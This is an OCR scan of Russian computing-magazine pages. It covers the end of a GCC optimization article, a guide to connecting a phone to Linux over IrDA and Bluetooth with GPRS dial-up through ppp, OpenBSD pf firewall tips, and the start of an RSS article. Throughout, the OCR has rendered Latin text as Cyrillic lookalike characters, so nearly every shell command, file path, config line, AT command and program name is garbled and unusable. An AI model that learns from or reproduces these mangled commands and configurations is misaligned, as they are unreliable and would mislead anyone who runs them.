связью, делая в этом направлении свои первые шаги, и, если эта идея 
не рассеется дымом, в обозримом будущем следует ожидать настоящего 
прорыва в области высоких скоростей и максимальной компактности кода. 
Впрочем, не будем говорить наперед. Поживем — увидим. А пользоваться 
компиляцией с обратной связью можноуже сейчас. 

^ БЫСТРАЯ ВЕЩЕСТВЕННАЯ МАТЕМАТИКА 

Вещественная математика (особенно двойной точности) до сих пор 
остается одним из узких мест, с которым не могут справиться даже 
современные сопроцессоры с их улучшенной архитектурой. Компи- 
лятор 6СС поддерживает ряд ускоренных методик вещественных 
вычислений, однако не задействует их даже на уровне оптимизации 
03, поскольку они отклоняются от стандартов 150 и ІЕЕЕ, а потому 
потенциально небезопасны и в некоторых случаях приводят к развалу 
программы. 

С другой стороны, программы, интенсивно перемалывающие веществен- 
ные числа, могут существенно повысить свою производительность. 




А потому стоит попробовать задать параметр '-((аБ^-таЙл’, активирующий 
‘-ЖоаІ-БІоге’, ‘-(по-тайл-еггпо', Ѵипзаіе-гпаіЬ-рбгпігаІіопБ’, ’-(по- 
Ігарріпд-таіИ', ‘-ТСіпіІе-таіН-опІу’, '-Іпо-гоипсІіпд-таЙѴ, ‘-(по-БІдпаІіпд- 
папз’ и ‘-Тсх-іітііесі-гапде*, после чего выполнить полный цикл тестиро- 
вания программы, и если что-то пойдет не так, то забыть о '-ЙНБ^-таЙл' и 
начать перебирать различные комбинации вышеупомянутых ключей по 
отдельности. В некоторых случаях это дает двух-, трехкратный прирост 
производительности. 

^ ЗАКЛЮЧЕНИЕ 

Вот мы и рассмотрели наиболее значимые ключи оптимизации, получив 
широкий оперативный простор для экспериментов. Конечно, кто-то может 
резонно возразить: а стоитли корпеть над какой-то программой несколь- 
ко дней, чтобы увеличить ее производительность на 30%-60%?! Если 
измерять время деньгами, то дешевле купить более быстрый процессор, но 
І_іпих всегда привлекал большое количество энтузиастов, проводящих дни 
и ночи напролет в бессмысленных (для окружающих) ковыряниях системы. 
Так что, дерзай ! Тебя ждут великие дела ! ц-ц 



Комментарий 

редактора 

По умолчанию ОСС генерирует код, который предполагает совмес- 
тимость с целым семейством процессоров. С помощью ключа ‘-тсріТ 
можно принудительно назначить тип целевого процессора для выра- 
ботки более оптимального кода (набор инструкций, использование 
регистров и параметры планирования инструкций будут установлены 
в соответствии с выбранным типом) . Так, на платформе ОрепВЗП/ 
Зрагс после внесения в конфигурационный файл /еГс/тк.сопГ записи 



«СОРТ5+ =-тсри=ѵ8» (архитектура ѵ8 соответствует реализациям 
зирегзрагс и Ьурегзрагс) и пересборки пакета ОрепЗЗН время регистра- 
ции удаленных пользователей (ззЫо^іп) сократилось в несколько раз! 

# есЪо "СОРТЗ+=-тсри=ѵ8 " » /ебс/тк. сопб 

# ссі /изг/згс/изг .Ьіп/ззіі 

# таке оЬз сіеапсііг сіерепсі 

# таке && таке іпзСаІІ 

Здесь есть и обратная сторона медали: код, полученный с 
помощью ‘-тсри=ѵ8’, может не работать на других Зип’овских 
процессорах. 
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Под р ужи 

моб ильник с тукс ом 



подключаемся к сотовому телефону в і_ших 



Сегодня мобильный телефон стал уже привычной и, главное, нужной в хозяйстве вещью. 
С его помощью можно не только разговаривать, но и выходить в интернет, фотографиро- 
вать, слушать музыку. Однако, чтобы полноценно использовать эти функции, требуется 
подключить его к компьютеру. Как это сделать в ѴѴІпсІоѵѵз, наверное, уже ты знаешь, сей- 
час разберем, что можно сделать с телефоном в Ілпих. 



г ПОДКЛЮЧАЕМ ТЕЛЕФОН К КОМПЬЮТЕРУ 

Существует несколько способов подключения мобильного телефона к 
компьютеру: с помощью СОМ/ИЗВ дата-кабеля, через инфракрасный порт 
(ІгРА) и ВІиеіооіЬ. Все они имеютсвои достоинства и недостатки. Дата- 
кабель обеспечивает более надежное соединение, ктомуже иногда с его 
помощью можно подзаряжать телефон. В случае ІгОА и ВІиеІооіН батареи 
сядут на порядок быстрее. 

Мне пришлось изрядно напрячься, чтобы найти подходящий кабель для 
своего первого телефона. Кабель, произведенный дядюшкой Ляо, не 
всегда обеспечивает все заложенные втелефон функции, а фирменный 
стоит далеко недешево, иногда до трети стоимости самого телефона. 
Инфракрасное соединение не оченьудобно в плане использования, ведь 
приходится все время держать глазки друг напротив друга, что в некото- 
рых ситуациях, например при движении, просто невозможно. Поэтому 
при покупке следующего телефона основным критерием для меня было 



наличие ВІиеІооіЬ. Преимуществ утаких моделей больше: если вдругснова 
захочется поменять телефон, то старый кабель окажется бесполезным, а 
адаптер ІІЗВ-ВІиеІооШ — нет, плюс в местах слабого сигнала телефон мож- 
но поместить повыше, а самому устроиться где-нибудь на диване. 

Пингвин, к нашей радости, поддерживает все варианты подключения, более 
того, в настоящее время уже нетребуется пересборка ядра с наложением 
патчей. Современные дистрибутивы при подключении ІІБВ-ВІиеіооіЬ 
адаптера выводят сообщение о найденном устройстве, а соответствующие 
программы без проблем обнаруживаютподключенный мобильныйтелефон. 
Кабель для подключения телефона к компьютеру может иметь два разъема: 
СОМ и 115В. В первом случае все просто: после подключения телефон будет 
висеть там, где ему и положено, то есть на/сІеѵ/ИуБ* (где «*» — цифра от 1 
до 4). Чтобы не мучиться с поиском, можно просто ввести «сітезд | дгер Ку»; 
вывод покажет активные устройства. Изначально большая часть телефонов 
115В не поддерживает, поэтому, чтобы все работало, требуется специальный 
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драйвер-конвертер. В ѴѴіпсІоѵѵз его устанавливают отдельно, а втехдистри- 
бутивах біпих, что мне попадались за последние два года, нужный драйвер 
уже был включен. Если ядро самосборное, поищи нужное командой: 

$ саб /изг/згс/ііпих/ . сопбід | дгер ІІ8В I дгер ЗЕКІАЬ 

Как минимум следует включить С0ЫРЮ_1)5В_5ЕВІАІ_. В этом случае телефон 
будет подключен к/беѵАіуАСМО (или 1), в некоторых дистрибутивах это может 
быть что-то вроде /сІеѵ/йуІІЗВО. Чтобы система увидела УЗВ-ІгОА устройства, 
ядро должно быть собрано с С0МРІ6_ІРВА, С О N Р 1 0_У 5 В_І Р О А, С0ЫРІ6_ 
ІРСОММ, С0ЫР10_1РВА_РА5Т_РР и прочими параметрами, включающими 
поддержку Ігй А. Каки ВІиеІооіЬ, ІгйАоброс различными спецификациями, 
которые, правда, скрыты от пользователя, но в біпих иногда все-таки прихо- 
дится сними стал ки ваться . Та к, и нф ра красны й п о рт м ожет ра ботать аж в трех 
режимах: РІР (Раз!, около 4 Мб/с], 51В (Зегіаі, 1 1 5,2 Кб/с) и неофициальный МІВ 
(Месііит, 0,5-1 ,1 Мб/с]. Последним параметром ядра, показанным выше, мы 
какраз и включили самый быстрый режим РІП.Теперьставим пакет ігсіа-ибіз: 



В ПОДДЕРЖКА ВШЕТООТН 

РІастройка Синего зуба во многом схожа с настройкой ІгйА, отличают- 
ся только команды. Однако на заре ВІиеІооіЬ в біпих была некоторая 
путаница, так как существовало несколько проектов, предлагающих 
свои драйверы, и в различных дистрибутивах можно было встретить 
разные решения. Ріо в последнее время ситуация, можно сказать, 
устаканилась, победил сильнейший — Віиег ( ѵѵѵѵѵѵ.Ыиег.ога ]. Хотя 
команда зисіо арі-сасбе зеагсб ЫиеІооіЬ выдает наличие драйверов 
АІТіх ( аНіх.збпеі ). Эти драйверы разрабатывались при поддержке 
N о кіа , но, к сожалению, за последние 3 года не было выпущено ни 
одного обновления. 

Віиеі поумолчанию включен во все последние ядра, поэтому в совре- 
менных дистрибутивах мы будем работать с именно ним. В самосборном 
ядре нужно включить все параметры в секции ВІиеІооіЬ беѵісе сігіѵегз 
(С0І\!РІ6_ВТ_*). 

Переходим кустановке нужных утилит: 




$ зисіо арб-деб іпзбаіі Ыиег-ибііз Ыиег-Ьсісіишр 



$ зисіо арб-деб іпзбаіі ігсіа-ибііз 

После его установки в каталоге /еіс/тосіиіііз (или/еіс/тосіиіііз.сі в зави- 
симости от дистрибутива] появится файл ігсіа-ибіз. В нем указаны модули, 
которые должны автоматически стартовать при загрузке системы (на этом 
шаге нелишним будет проверить содержимое файла /еіс/тосіиіез.сопі]. 
Подключаем устройство и активируем его командой: 

$ ігаббасЬ ігсІаО -з 

В результате должен загрузиться модуль ядра, а само устройство будет 
находиться на /беѵ/ігсІаО или /беѵ/ігсоттО. В некоторых случаях программа 
не может самостоятельно определить устройство, тогда его следует указать 
вручную, использовав параметр *-сГ. 



В каталоге /еіс/тосіиіііз мы найдем файл Ыиег со списком модулей 

$ саб /ебс/тосІибіІз/Ыиег 

# В1ие2 тосіиіез 

аііаз пеб-рб-31 Ыиег 

аііаз Ьб-ргобо-0 12сар 

аііаз Ьб-ргобо-2 зсо 

аііаз Ьб-ргобо-3 гбсотш 

аііаз Ьб-ргобо-4 Ьпер 

аііаз Ьб-ргобо-5 сшбр 

аііаз Ьб-ргобо-6 Ьісір 

аііаз ббу-1(1ізс-15 Ьсі_иагб 

аііаз сЬ.аг-таз ог-10-250 1ісі_ѵ]ісі 



$ ігаббасЪ. ІгсІаО -сі асбізуз -з 

Полный список поддерживаемых устройств доступен по команде ігаНасЬ 
--Ьеір. Протестировать соединение можно с помощью утилиты ігбасіштр, 
которая после запуска выводитсписок проходящих пакетов. Само соеди- 
нение должно быть видно по команде Ибопбд. Есть и свой аналог команды 
ріпд — ігбаріпд. В качестве параметра следуетуказать принимающий Ю 
устройства (берется из дампа). Кроме того, значения некоторых ІгОА-пара- 
метров можно подсмотреть в файловой системе /ргос: 

$ саб /ргос/пеб/ігсіа/ігіар 



Примечание: в таких дистрибутивах, какЗІаскѵѵаге, все это придется вби- 
вать вручную. 

Вставляем адаптер 1Ч5В- ВІиебооіИ и проверяем, найдено ли устройство: 

$ /зЬіп/ІзтосІ I дгер изЬ 
Ъсі_изЬ 18204 б 

ЫиебообЪ 55908 15 гбсотт, 12сар , Ьсі_изЬ 

изЬсоге 134280 4 Ь.сі_изЬ , оЬсі_1іссІ, еЪ.сі_Ь.сс! 

Кроме того, соответствующая информация должна появиться в/ѵаг/іод/ 
теззадез: 
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Окно ВІиеІооіЬ Еііе Тгапз^ег 



$ дгер изЬ /ѵаг/іод/теззадез 




Исчерпывающую 
информацию о 
работе инфракрас- 
ных устройств можно 
получить на сайте 
проекта Ыпих/ІгОА 
( ігсІа.зЕпеІ: ) . 



С помощью Нсісопбд, входящей в комплект Ыиеі-ибІБ, смот- 
рим, как система видит наш адаптер: 

$ Ъсісопбід -а 
ЪсіО: Туре: БЗВ 

ВБ АсМгезз : 00 : ОБ: 18 : 01 : 1С : 05 АСЬ МТБ: 
192 : 8 ЗСО МТБ: 64 : 8 

БР КБШІЫС РЗСАБ ІЗСАБ 
ВХ ЪуЬез : 528 асі : 0 зсо : 0 еѵепЬз : 42 
еггогз : 0 

ТХЬуЬез:410 асі: 0 зсо:0 сошшапйз : 30 
еггогз : 0 

Если ВО-адрес равен нулям и статус равняется 00ѴѴЫ, 
то это означает, что демон Ьсісі (Віиеіооіб Нозі: СопІгоІАег 
Іпіег^асе йетоп) не запущен. Настройки бсісі производятся 
в файле /еІс/ЫиеІооіЬ/бсісІ.сопЕ Он хорошо прокомменти- 
рован, и в большинстве случаев можно вообще ничего не 
трогать. Параметр зесигііу изег означает, что при обнару- 
жении нового устройства все время будетзапрашиваться 
РІ N . Если его лень вводить каждый раз, меняем изег на 
аи!:о и в раззкеу прописываем код, который будет использо- 
ваться при соединении (задействуй только цифры). Совсем 
ленивые (но беспечные) могут использовать и попе. Кстати, 
за получение РІ N отвечаетутилита Ыиег-ріп. Если в ЬсісІ. 
сопі 1 вносились изменения, перезапускаем демон: 



$ /изг/зЬіп/Ъсісопбід ЬсіО ир; /изг/зЬіп/ІісісІ. 
-б /еЬс/ЫиебооЫі/Іісісі. сопб 



И опять проверяем, обнаружено ли наше ВІиеІооіЬ-устройст- 
во. Найти все активные устройства можно с помощью: 



$ ЬсіЬооІ зсап 
Зсаппіпд . . . 

0 0 : 0 Г : БЕ : ІА : 3 4 : 0 5 Т630 



Итак, телефон успешно найден, соединяемся с ним: 
$ зиск) 12ріпд 00 : 0Р:БЕ: ІА: 34 : 05 



Вводим РІ N и смотрим, как проходят пакеты. Утилита Ьсііооіз 
имеетеще ряд параметров, позволяющих проверить время 
на другом устройстве, регенерировать ключи, сменить 
режим шифрования и прочее. Например, чтобы просмотреть 
информацию о найденном устройстве, используем ключ і пбо : 

$ ЬсіЬооІ іпбо 00 : 0Р : БЕ : ІА: 34 : 05 

Как и в случае с ІгОА, здесьтакже есть свой снифер — Ьсібитр, 
с его помощью можно прослушивать трафик, проходящий че- 
рез НСІ-интерфейсы. Кстати, если понадобится указать файл 
устройства вручную, используй/беѵ/НсоттО (в ядрах младше 
2.6.19 это /беѵ/ЫиеІооІб/Нсотт/О). 

г ВЫХОДИМ В ИНТЕРНЕТ 

Чтобы получить информацию обо всех возможностяхтелефо- 
на, следует использовать программу зсіріооі, реализующую 
протокол Зегѵісе Оізсоѵегу Ргоіосоі. Ее задачей как раз и 
является поиск и выбор сервисов, предоставляемых другими 
устройствами: 

$ зсірбооі Ьгсжзе 00 : 0Р : БЕ : ІА: 34 : 05 
Вгсжзіпд 00 : 0Р : БЕ : ІА: 34 : 05 ... 

Зегѵісе Ыате: Біаі-ир БеЩлгогкіпд 
Зегѵісе ВесНапсІІе: 0x10000 
Зегѵісе Сіазз ІБ Ьізб: 

"Біаіир ЫеЬѵ/огкіпд" (0x1103) 

"Сепегіс Ыекѵгогкіпд" (0x1201) 

Ргокосоі Безсгірбог Ьізб: 

" Б2САР " (0x0100) 

"КРСОММ" (0x0003) 

Скаппеі : 1 

Ргобііе Безсгірбог Ьізк: 

"Біаіир Ыекѵ70гкіпд" (0x1103) 

Ѵегзіоп: 0x0100 



Полученной информации будет достаточно, чтобы убедиться 
в том, что мы не все знаем о своем телефоне. Для выхода в ин- 
тернет нас интересует наличие Оіаі-ир ЫеЬл/огкіпд, который, 
как видим, привязан к каналу номер 1 . Для работы этот сервис 
необходимо связать с устройством гісотт. 
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Модули ядра для ІгОА и Віиеіооіб 




$ зисіо гбсотт Ъіпсі гбсоттО 00 : 0Е :БЕ : ІА: 34 : 05 1 

Проверяем, всели сделано правильно: 

$ зисіо гбсотт зікж 00 : 0Г :БЕ : ІА: 34 : 05 
гбсоіптО : 00 : 0Е : БЕ : ІА: 34 : 05 сііаппеі 1 сіеап 

Для удобства все настройки можно сохранить в файле /еІс/ЫиеІооіЬ/ 
Нсотт.сопі 1 (здесь сложностей быть не должно, внутри уже есть готовые 
шаблоны) и в дальнейшем запускать все одной командой зисіо /еіс/іпіі. 
сІ/ЫиеІооіЬ зіагі. 

Программа тіпісот позволяетуправлять модемом телефона с помощью 
АТ-команд. Доступ в интернет настраивается с помощью кррр, ѵѵѵсііаі или 
ррр. Я использую последний вариант. Рассмотрим процесс подключения 
коператору Вееііпе. Для начала создаем файл /еіс/ррр/реегз/дргз такого 
содержания: 

$ 51Ш0 МСЕБІТ /ЕТС/РРР/РЕЕР5/ѲРР5 

/Ьеѵ/гбсоіпті 115200 поаибіі сіебаиібгоибе изереегбпз 
ирсіебасЬ регзізб поірсіебаиіб Іоск соппесб ' /изг/зЫп/ 
сЬаб -ѵ -1 /ебс/ррр/Ъее ' поѵзссошр порсошр поассошр 
поірсіебаиіб посіебіабе поѵз поЬзсісотр 

И второй файл /ебс/ррр/Ьее: 

$ 51Ш0 МСЕБІТ /ЕТС/РРР/ВЕЕ 

ТІМЕОБТ 45 

АВОЕТ ВИЗУ 

АВОЕТ "N0 САЕЕІЕЕ" 

АВОЕТ ЕЕЕОЕ 

.... ' АТЕ1 ' 

ОК АТ+СОВеО№Г=1 , "ІР" , «" іпбегпеб .Ьееііпе . ги " 

ОК АТБ*99***1# 

СОШЕСТ 

Для подключения к другим операторам достаточно изменить третью 
строку снизу. Например, в случае МТС вместо строки «іпІегпеІ.ЬееІіпе. 
ги» пишем «іпІегпеЕтІз.ги». В некоторых случаях, возможно, придет- 
ся изменить номер дозвона, проставив вместо «*99***1» значение, 



указанное на сайте своего мобильного оператора. Теперь запускаем 
демон рррб : 

$ зисіо /изг/зЬіп/рррсі саіі дргз 

В другой консоли лучше ввести Іаіі -іУѵаг/Іод/теззадез, чтобы проследить 
за ходом соединения. На экране мобильного телефона должен отобра- 
зиться процесс подключения. Поднятый интерфейс рррО (для проверки 
— Тсопбд рррО) говоритотом, что со связью с мобильным оператором все в 
порядке. И не забудь занести в /еіс/гезоіѵ.соп! 1 данные 0145-сервера (мож- 
но любого). Теперь, для того чтобы выйти в интернет, достаточно набрать 
всего две команды: 

$ зисіо /ебс/іпіб . Ь/ЫиебообЪ. збагб 
$ зисіо /изг/зЬіп/рррсі саіі дргз 

Примечание: на сайте ІіпихтоЬіІе.Ігп.ги выложены готовые скрипты для 
различных операторов мобильной связи. 

^ ПРОГРАММЫ ДЛЯ РАБОТЫ С ТЕЛЕФОНОМ 

Сразу после подключения телефон готов принимать и отправлять файлы. 
Чтобы передать файл на телефон, достаточно в контекстном меню 
Копциегог выбрать «Действия -> Передать через ВІиеІооіИ». Появится 
окно В Іи еіооіИ Рііе Тгапз^ег, и будет выполнен поиск подключенных 
устройств, отображенных в поле «Устройство». В окно «Отправляемый 
файл» можно перетаскивать другие файлы, подготовленные для отправ- 
ки на телефон или другое ВІиеІооіЬ-устройство. Нажимаем «Отправить», 
и файл уходит. 

Обратный процесстакже прост. При попытке отправить файл стелефона 
появляется запрос на разрешение приема файла. Нажимаем «Принять» 
и в окне Іпсотіпд Рііе Тгапзіегуказываем, куда сохранить принятый 
файл. Чтобы в дальнейшем система автоматически принимала решение 
о приеме или блокировке, установи флажок«Запомнить это устройство» 
и в списке «Последующие правила...» укажи действие: АНоѵѵ («Разре- 
шить») или Оепу («Блокировать»), Если ничего не работает, попробуй 
запустить демон кЫиеіюоіЬсІ. 

Следующее оченьудобное приложение — КОЕ КтоЬіІеТооІз 
( ѵѵѵѵѵѵ.кппоЬіІеІооІз.ога ). которое позволяет контролировать мо- 
бильные телефоны с компьютера. Поддерживается отправка зтз, 
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набор номера, телефонная книга и мониторинг соединения. Кроме 
этого, оно интегрируется в среду КйЕ и может работать с менедже- 
рами персональной информации Копіасі и КАсІсІгеззВоок. Работос- 
пособность протестирована с телефонами Моіюгоіа, Ыокіа.ЗіетепБ, 
5опу Егісззоп и 66 . Но должно поддерживаться любое устройство, 
понимающее АТ-команды. В репозитарии II Ьи пЕи эта программа 
присутствует. Достаточно набрать зисіо арі-деі і пз1;а II ктоЬіІеІооІз 
и можно работать. По умолчанию программа будет искать телефон 
по /беѵ/тосіет (как и многие другие), поэтому удобнее сразу после 
настройки телефона создать символическую ссылку с таким именем. 
После подключения в основном окне будет выведена информация о 
заряде батарей и уровне сигнала. 

Интерфейс не переведен, но разобраться совсем несложно. Снача- 
ла синхронизируем контактную книгу, выбрав РЬопеЬоокз и нажав 
Пе^тезЬ. Правда, у меня все имена, набитые кириллицей, преврати- 
лись в кракозябры. Теперь, чтобы отправить зтз, достаточно клик- 
нуть по Ыеѵѵ 5М5, затем по Ріск ЫитЬег, выбрать номер изспискаи 
нажать на Абб Оезбпабоп. Если зтз отправляется нескольким або- 
нентам, повторяем операцию. Печатаем текст в специальном поле и 
посылаем по 5епб 5М5. Для тех, кто не любит набивать зтз’ки, это 
то, что доктор прописал. 

Рекомендую. 

Для синхронизации телефонной книги мобильного телефона и 
КАббгеззВоок можно использовать программу Капбу ( капбѵ.кбе.ога ). Она 
есть в репозитарии ІІЬипІи, поэтому установить ее просто: зибо арі-деі 
іпзіаіі капбу. После установки следуетзайти в «Настройка -> Настро- 
ить Капбу» и в поле «Последовательное устройство» указать на файл 
устройства, к которому подключен телефон. Интерфейс Капбу разделен 
на две панели адресов, позволяющих визуально сравнивать списки. Для 
слияния или синхронизации адресных книгнажимаем одноименные 
кнопки. Кроме этого, в Капбу есть терминал, с помощью которого можно 
управлять телефоном посредством АТ-команд. Причем особых знаний 
для этого не требуется, просто выбираем в списке команду, и в окне спра- 
ва появляется результат. В основном окнетакже показана информация 
об уровне сигнала и заряде батарей. 

Еще две программы с практически аналогичной функциональностью — 
ЗСМхх ( ѵѵѵѵѵѵ.Ьепбгік-заиіег.бе/зстхх ) и графический интерфейс дзстхх 
[ дзстхх.зЕпеб . С их помощью можно копировать файлы на мобильник 
и обратно, удалять их, работать с адресной книгой, отправлять зтз, 
синхронизировать время, получать информацию о состоянии телефона и 
прочее. Например, посмотрим, чем сейчас занимается мобила: 

$ зстхх --іпбо --(беѵісе /сіеѵ/гбсоішпО 



Кроме зстхх в комплект входят еще три утилиты: абг2ѵсб аросопѵ и зті. 
Первые две предназначены для преобразования адресных книг в разные 
форматы, третья — для преобразования бинарных зтз-файлов втекс- 
товый или С5Ѵ. В списке поддерживаемыхтелефонов одни Зіетепз’ы, 
однако с моим ЗопуЕгісззоп’ом она тоже нашла общий язык. 
Единственное, что удалось найти на сайте проекта КйЕ, 

— это скрипт ВІиеатагоК ( ѵѵѵѵѵѵ.кбе-аррз.огд/сопіепі/зЬоѵѵ. 
рбр?сопІеп1:=33258 І. позволяющий управлять плеером Атагок с по- 
мощью ВІиеІооіЬ. Используя мобильный телефон, можно останавли- 
вать, запускать на воспроизведение, просматривать плей-лист, вы- 
бирать мелодию, редактировать некоторую информацию и прочее. 

В репозитарии его нет, поэтому качаем с сайта. Теперь в Атагок выби- 
раем «Сервис -> Управление сценариями -> Установить сценарий» и 
указываем на архив. Послеустановки нажимаем кнопку «Выполнить», 
вводим в окне устройство, к которому подключен мобильник. В случае 
успеха на экране мобильного появится надпись «ВІиеатагоК» либо 
текущая мелодия. Входим на телефоне в меню «Связь-^ Аксессуары», 
выбираем ВІиеатагоК и получаем доступ к функциям управления про- 
игрывателем. 

Еще одна сладкая парочка — Сатти ( ѵѵѵѵѵѵ.датти.огд ) и интерфейс 
ѴѴатти [ ѵѵатти.еи ]. Использование кросс-платформенной библиотеки 
ѵѵхРуІбоп позволяетзапускать ее нетолько в Еіпих/*В50, но и в ѴѴіпбоѵѵз. 
Принцип настройки аналогичен, после запуска заходим в ЗеШпд и в 
«Соппесбоп -> Оеѵісе» выбираем устройство. 

Теперь можно редактировать и импортировать контакты, списокза- 
дач, отправлять зтз и ттз, экспортировать сообщения в е-таіі, уп- 
равлять некоторыми настройками телефона, вроде поиска РМ-стан- 
ций. По умолчанию в списке присутствуют только Ыокіа и Зіетепз, 
но по идее программа должна работать и с другими марка ми. Быстро 
отправить зтз можно и с помощью 6Ы0МЕ Рбопе Мападег, который 
в КІІЬипІи устанавливается командой зисіо арЕ-деІ іпзіаіі дпоте- 
рбопе-тападе. После его запуска в панели задач появится значок, 
выбираем Рге^егепсез и в Соппесбоп указываем устройство. 

Теперь, когда телефон обнаружен, достаточно вызвать 5епб Меззаде, 
ввести номер телефона (синхронизации с адресной книгой нет) и 
набрать сообщение. Все просто и понятно. 

Пользователям Моторолок на базе Р2К (С380/С650/Е398Е680/Е680І/А780 
и других) хочу порекомендовать файловый менеджер то!о41іп [ тоіо41іп. 
зТпеб . С его помощью можно легко закачать, скачать и удалить файлы (в 
том числе и баѵа-мидлеты) на телефоне, отредактировать память 5ЕЕМ, в 
которой хранятся все основные настройки сотового. 

Это далеко не все программы для работы с мобильным телефоном, но 
остальные, надеюсь, ты сможешь найти сам. Удачи. т 




Я недавно заморочился этой темой, 
статья в кассу. Могу посоветовать 
сайт, который мне здорово помог: 
біпих Іпітагеб НОѴѴТО [ \л/ѵѵѵѵ.б.бр.огд 
/НОѴѴТО/ІпІта геб-НОѴѴТО ) 



Да ну на фиг. Дружить мобиль- 
ник, да еще с туксом, — это не 
по мне. 
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АНДРЕИ МАТВЕЕВ 

/ АМОРШ5НОСК РЕАІ.. ХАКЕР. РШ / 




^ ипіхоій 



юниксоида 



Доблестный юниксоид ! 
Представляю твоему вни- 
манию подборку различ- 
ных трюков, рекомендаций 
и советов, касающихся 
фильтра пакетов рй 



Блокируем широковещательные запросы 
и пакеты с фальсифицированным адресом 
источника: 

ІаЫе <Ыаск1ізк> { 127.0.0.0/8, 

192.168.0. 0/16, 172.16.0.0/12, \ 
0.0. 0.0/8, 169.254.0.0/16, 

192.0. 2.0/24, 224.0.0.0/3, \ 
255.255.255.255/32 } 

Ыоск іп диіск оп $ехк_іб іпек бгот 
апу ко 255.255.255.255 
Ыоск іп Іод диіск оп $ехк_іб іпек 
бгот <Ъ1аск1ізк> ко апу 

Регистрируем заблокированные попытки 
соединения: 

Ыоск гекигп Іод(аіі) 

Разрешаем прохождение ІСМР-запросов: 

істр_курез = "{ ескогед, ипгеаск }" 
разз іпек ргоко ісшр аіі істр-куре 
$істр_курез кеер зкаке 

Для корректной работы утилиты Ігасегоиіе 
необходимо разрешить ІЮР-пакеты с портом 
назначения 33433 — 33626: 

разз оик оп $ехк_іб іпек ргоко исір 
бгот апу ко апу рогк 33433 >< 33626 
кеер зкаке 

Воттак можнотранслировать внутренние 
адреса в основные для двух внешних сетевых 
интерфейсов: 

пак оп $ехк_іб_а іпек бгот <изегз> 



пЧгіскз 



ТРЮКИ И СОВЕТЫ ЮНИКСОИДУ 



ко апу -> ($ехк_іб_а: 0) 

пак оп $ехк_іб_Ъ іпек бгот <изегз> 

ко апу -> ($ехк_іб_Ъ: 0) 

За счетиспользования ключевого слова 
5сшЬ можно производить нормализацию и 
дефрагментацию ІРѵ4-пакетов, к примеру, 
такмы оставим птар неудел: 

зсгиЪ іп 

Встроенный методдля борьбы с ІР 
ЗрооЛпд’ом: 

апкізрооб Іод бог { 1о0, $іпк_іб } 
іпек 

Для того чтобы ѴоІР-телефон с ІР-адресом 
192.168.1.122 мог работать через шлюз *В50/ 
рб следует добавить следующие правила: 

зек кішеоик { исір.бігзк 3 00, исір. 
зіпдіе 150, исір .тиікіріе 900 } 
пак оп $ехк_іб ргоко исір бгот 
192.168.1.122 ко апу -> $ехк_іб:0 
зкакіс-рогк 

разз іп диіск оп $ехк_іб іпек ргоко 
исір бгот апу ко апу \ 

рогк 5060 кеер зкаке 
разз оик диіск оп $ехк_іб іпек 
ргоко исір бгот { $ехк_іб:0, 
192.168.1.122 } \ 

ко апу кеер зкаке 

разз іп диіск оп $іпк_іб іпек ргоко 
исір б г от 192.168.1.122 \ 
ко апу кеер зкаке 

Чрезмерную активность ззЬ-брутфорсеров 
можно подавить, отслеживая максимальное 
количество подключений: 

каЫе <ззЫэб> регзізк 

Ыоск іп Іод диіск оп $ехк_іб іпек 

бгош <ззЬЬб> 

разз іп Іод оп $ехк_іб іпек ргоко 
кср ко $ехк_іб рогк ззЬ. кеер зкаке \ 
(шах-згс-сопп-гаке 5/60, 
оѵегіоасі <ззЬЬб> біизіі дІоЬаІ) 

Примечание: таблицу ббЬЬ^с ІР-адресами 



злоумышленников можно периодически 
очищать: 

# сгопкаЬ -е 

0 7**6 

/зЬіп/рбскІ -к ззЫэб -ТбІизЪ. 2>/ 
сіеѵ/пиіі 

Интересующие тебя пакеты можно перена- 
правлять на псевдоинтерфейс рйодО: 

ехк_іб = " бхрО" 

зек Іодіпкегбасе $ехк_іб 

Для просмотра журналов набирай: 

# ксрсіитр -пекккг /ѵаг/іод/рбіод 

Для просмотра событий в режиме реального 
времени: 

# ксрсіитр -пекккі рбІодО 

Пример простейшего учета трафика: для 
каждого правила добавляем метку (ІаЬеІ) и 
периодически запускаем рбскі -бі: 

разз оик Іод бгош <с1іепкз> ко апу 
рогк { 25, 110, 993, 995 } \ 

ІаЬеІ сііепк-ешаіі кеер зкаке 

При перенаправлении пакетов можно ис- 
пользовать диапазон портов: 

гсіг оп $ехк_іб ргоко кср рогк 
6000:7000 -> $кагдек 

Для экономии динамически выделяемой па- 
мяти можно уменьшить значения тайм-аутов 
втаблице состояния соединений: 

зек оркішігакіоп аддгеззіѵе 

Еще один небольшой оптимизационный 
трюк: можно отказаться от использования рОб 
(разБІѵе ОБбпдегргіпбпд, пассивное опреде- 
ление версии операционной системы): 

зек біпдегргіпкз "/сіеѵ/пиіі" ПС 
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ИГОРЬ АНТОНОВ И 

I АМТОМОѴ.ІСОИ.КНѴдСМАІІ_.СОМ /| 



ГРАБИМ 

К55 

ВЫДИРАЕМ И РАСПРЕДЕЛЯЕМ АКТУАЛЬ- 
НУЮ ИНФОРМАЦИЮ С ПОМОЩЬЮ ОЕЬРНІ 

У каждого из нас есть множество люби- 
мых сайтов, за обновлениями которых 
постоянно приходится следить. Хорошо, 
когда таких сайтов немного: зашел на 
главную страницу, почитал новости и 
ушел. Беда в том, что у бывалых пользова- 
телей интернета таких сайтов несколько 
десятков. Как уследить за каждым из них? 
Постоянно бегать по десяткам ссылок, 
гоняя драгоценный трафик? Нет! Гораздо 
проще и удобнее получать новости в 
формате К.38. 




ак известно, для чтения новостей в формате В55 созданы про- 
граммы — Р55-агрегаторы. Стоим им только подсунуть ссылку 
на ленту новостей, как они тутже начинают бдительно следить 
за обновлениями и показывать всетопики вудобном виде. 
Многие разработчики уже давно ветра ива ют читалки В55 в свои браузеры. 
По такому пути пошли разработчики Орега, РігеРох, ІЕ и многие другие. 
Использовать готовые программки — хорошо, но еще лучше научиться соз- 
давать их самостоятельно (это подариттебе удивительную легкость в плане 
получения и хакерского распределения информации ;)). Для этого нужно 
только выделить время и разобраться с форматом Р55. 

X ТЕОРИЯ Р55 

Аббревиатура Н55 расшифровывается как Реаііу Бітріе Бупсіісабоп, что в 
переводе на великий и могучий означает «действительно простая достав- 
ка». Благодаря этому формату все мы можем оперативно получать новости 



со своих любимых порталов, не дожидаясь долгой загрузки сайтов. Мы 
получаем только самое необходимое, напримертему новости, коротенькое 
описание, дату публикации и ссылку на полный текст. Экономия трафика, 
особеннодля 6РН5-юзеров, оченьсущественная. 

Но не стоит думать, что формат Р55 предназначен лишь для публикации но- 
востей. Вовсе нет. Используя этутехнологию, можно запросто передавать 
